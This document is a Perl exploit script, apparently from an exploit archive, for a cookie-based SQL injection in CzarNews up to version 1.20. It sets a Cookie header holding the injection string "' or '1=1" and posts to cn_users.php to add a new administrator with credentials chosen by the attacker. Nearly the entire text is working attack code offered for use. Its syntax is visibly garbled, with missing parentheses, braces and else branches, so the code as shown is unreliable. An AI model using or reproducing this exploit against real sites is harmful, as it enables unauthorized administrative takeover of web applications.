# ----------------------------------------------------------
# CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit
# Perl Exploit - Add a new admin with your credentials!
# Discovered On: 15/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# ----------------------------------------------------------
# Usage: perl http://localhost/cms StAkeR obscure
# ----------------------------------------------------------

use strict;
use LWP::UserAgent;

my $email = 'some@example.net';
my ($hostname,$username,$password) = @ARGV;
my $request  = undef;
my $http_s   = new LWP::UserAgent or die $!;

$hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
banner() unless $username and $password;

$http_s->agent("Mozilla/4.5 [en] (Win95; U)");
$http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1");           

$request = $http_s->post($hostname."/cn_users.php",
                          user    => $username,
                          pass    => $password,
                          email   => $email,
                          allcats => "all",
                          admin   => "off",
                          news    => "on",
                          images  => "on",
                          users   => "on",
                          categories => "on",
                          config  => "on",
                          words  => "on",
                          op => "add",
                          id => '',
                          go  => "true",
                          submit => "Add+User"
  if($request->content =~ /has been added/i)
    print "[+] Added New Administrator: $username & $password\n";
    print "[!] Exploit Failed!\n";
    print "[!] Site Not Vulnerable\n";

sub banner
  print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n";
  print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
  return exit;